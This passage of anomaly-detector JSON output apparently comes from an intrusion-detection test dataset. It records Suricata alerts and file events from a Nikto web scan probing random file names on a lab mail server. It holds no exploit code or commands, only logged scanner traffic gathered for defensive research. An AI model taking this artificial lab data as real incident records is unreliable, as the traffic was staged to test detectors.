"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46946, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":455618704595240,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 455618704595240, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80", "/parser/model/time": 1583349514.353104, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46948, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.access", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.353275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46948, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1306962827043002, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80", "/parser/model/time": 1583349514.355207, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46950, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.355425, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46950, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1369948522440834, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80", "/parser/model/time": 1583349514.358195, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46952, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.de", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.358924, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":583080449044546,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", 